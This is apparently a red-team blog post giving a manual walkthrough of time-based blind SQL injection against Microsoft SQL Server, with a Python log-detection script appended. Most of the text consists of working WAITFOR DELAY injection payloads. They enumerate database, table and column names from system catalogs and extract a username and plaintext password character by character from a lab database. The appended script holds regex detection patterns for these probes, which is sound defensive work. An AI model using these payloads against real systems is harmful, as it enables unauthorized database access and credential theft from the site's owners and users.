saulGoodman
A public account focused on red team offensive and defensive security research
Microsoft SQL Server time-based blind injection: manual injection notes
Overview of time-delay injection
Delay function: WAITFOR DELAY
WAITFOR
WAITFOR is a flow-control statement provided by Transact-SQL in SQL Server. It waits for a specified period of time and then continues executing the statements that follow. It takes the argument DELAY, which specifies how long to wait.
If the injected statement executes successfully, the database pauses and the response to the web request comes back after a specific delay. Because the condition being tested does not depend on the content of the returned page, it is easy to tell whether the injection succeeded: from whether or not the web request is delayed, a penetration tester can determine whether an injection vulnerability exists on a site. And because the statement returns no specific content, it is also an important way to detect blind injection.
Syntax:
WAITFOR DELAY '0:0:n'
Example:
WAITFOR DELAY '0:0:4' -- delay for 4 seconds
IF exists () clause
Syntax:
IF exists () WAITFOR DELAY '0:0:5'
Manual time-delay injection
1. Determine whether an injection point exists
WAITFOR DELAY '0:0:4'
2. Guess the database name
Guess whether a database exists
if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--
This statement checks whether a database with the given dbid exists. If it does, the response is returned after a 3-second delay.
Guess the name from the dbid: first guess its length
if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--
Because I created only two databases, test (dbid 5) and saulgoodman (dbid 6), I can use the above statement to check whether the name of the dbid 5 database has the length tested in the statement (len(name)=4); if it does, the response is delayed by 3 seconds.
Similarly, to guess the length of dbid 6 (saulgoodman) you can use this statement:
if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--
If you have more databases, the statements follow the same pattern.
Query the database names one by one by dbid
Because we know which database is test (dbid 5 in the statements below), we can guess its name character by character:
Guess the first character: t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
Guess the second character: e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
Guess the third character: s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
Guess the fourth character: t
To query the dbid 6 database, saulgoodman, we only need to change the dbid number, like this:
Guess the first character: s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
Guess the second character: a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
Guess the third character: u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
Guess the fourth character: l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
Guess the fifth character: g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
Guess the sixth character: o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
Guess the seventh character: o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
Guess the eighth character: d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
Guess the ninth character: m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
Guess the tenth character: a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
Guess the eleventh character: n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--
3. Guess the table name
Because we know the database name is test, we can use the following statement to check whether the length of the first table name is 5 (the table name is users):
if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--
The figure shows the page returned normally, which means the table name has length 5; then we can guess its characters one by one: users
Guess the first character: u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
Guess the second character: s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
Guess the third character: e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
Guess the fourth character: r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
Guess the fifth character: s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--
Because we know the database name is test and the first table is users, we can use the following statements to query the characters of the second table name (the table name is info):
Guess the first character: i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
Guess the second character: n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
Guess the third character: f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
Guess the fourth character: o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--
4. Guess the column name
Because we know the table name is users, we can guess the column names in the users table (the column name is username):
Guess the first character: u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
Guess the second character: s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
Guess the third character: e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
Guess the fourth character: r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
Guess the fifth character: n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
Guess the sixth character: a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
Guess the seventh character: m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
Guess the eighth character: e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--
This way we guess out the first column name: username!
The second way: we have four columns, id, username, password and age (first get the first column name, id):
Get the first character: i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
Get the second character: d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--
Get the second column name (username):
Get the first character: u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
Get the second character: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
Get the third character: e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
Get the fourth character: r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
Get the fifth character: n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
Get the sixth character: a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
Get the seventh character: m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
Get the eighth character: e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--
Get the third column name (password):
Get the first character: p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
Get the second character: a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
Get the third character: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
Get the fourth character: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
Get the fifth character: w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
Get the sixth character: o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
Get the seventh character: r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
Get the eighth character: d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--
Guess the data character by character
We know the table name is users and the column names are username and password, so now we start dumping the data: (saul)
Check the first character of the username column: s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
Check the second character of the username column: a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
Check the third character of the username column: u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
Check the fourth character of the username column: l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
This gives us the first username: saul
Get saul's password (the password is saul520)
Check the first character of the password column: s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
Check the second character of the password column: a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
Check the third character of the password column: u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
Check the fourth character of the password column: l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
Check the fifth character of the password column: 5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
Check the sixth character of the password column: 2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
Check the seventh character of the password column: 0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--
That concludes these notes on manual time-based blind injection for MSSQL.
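As an added example that is not part of the original post, the following Python script shows the defensive side of the technique described above: it URL-decodes access-log request paths, flags the WAITFOR DELAY primitive, the sysdatabases/sysobjects/syscolumns catalog lookups and the ascii/substring character oracle used in every step of the walkthrough, and marks the probes whose response time was actually slow (the "condition was true" signal the inference depends on). The log lines, their field layout and the 2.5-second threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines: "METHOD PATH STATUS RESPONSE_MS".
# Not taken from the original post; they mimic the WAITFOR DELAY probes it describes.
SAMPLE_LOG = """\
GET /item.aspx?id=5 200 41
GET /item.aspx?id=5%3BWAITFOR+DELAY+%270%3A0%3A4%27-- 200 4052
GET /item.aspx?id=5%3Bif+((select+count(*)+from+master.dbo.sysdatabases+where+dbid%3D5)%3D1)+waitfor+delay+%270%3A0%3A3%27-- 200 3038
GET /item.aspx?id=5%3Bif+(ascii(substring((select+top+1+name+from+master.dbo.sysdatabases+where+dbid%3D5)%2C1%2C1))%3D116)+WAITFOR+DELAY+%270%3A0%3A3%27-- 200 3040
GET /item.aspx?id=5%3Bif+(ascii(substring((select+top+1+name+from+master.dbo.sysdatabases+where+dbid%3D5)%2C1%2C1))%3D117)+WAITFOR+DELAY+%270%3A0%3A3%27-- 200 39
GET /search.aspx?q=waitfor+delay 200 35
"""

# The delay primitive with its time literal, the MSSQL catalog views the post
# enumerates, and the per-character oracle (ascii/unicode over substring).
WAITFOR_RE = re.compile(r"\bwaitfor\s+delay\s+'\d+:\d+:\d+'", re.I)
CATALOG_RE = re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b", re.I)
CHAR_ORACLE_RE = re.compile(r"\b(ascii|unicode)\s*\(\s*substring\s*\(", re.I)

def normalise(raw_path):
    """URL-decode twice (double encoding is common) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(raw_path))
    return re.sub(r"\s+", " ", decoded)

def classify(line, slow_ms=2500):
    """Return the findings for one log line; an empty list means nothing suspicious."""
    _method, path, _status, ms = line.split()
    query = normalise(path)
    findings = []
    if WAITFOR_RE.search(query):
        findings.append("waitfor_delay")
    if CATALOG_RE.search(query):
        findings.append("catalog_enum")
    if CHAR_ORACLE_RE.search(query):
        findings.append("char_oracle")
    # A WAITFOR probe whose response really was slow means the tested condition
    # held (or the bare probe fired): the signal the post's inference relies on.
    if "waitfor_delay" in findings and int(ms) >= slow_ms:
        findings.append("delay_observed")
    return findings

def scan(log_text):
    # Map 1-based line numbers to findings, keeping only lines that have any.
    hits = {}
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        findings = classify(line)
        if findings:
            hits[lineno] = findings
    return hits
```

The last sample line shows why the time literal is part of the pattern: a search for the words "waitfor delay" alone is not flagged, while the real probes are, and the two character-oracle probes differ only in whether the delay was observed.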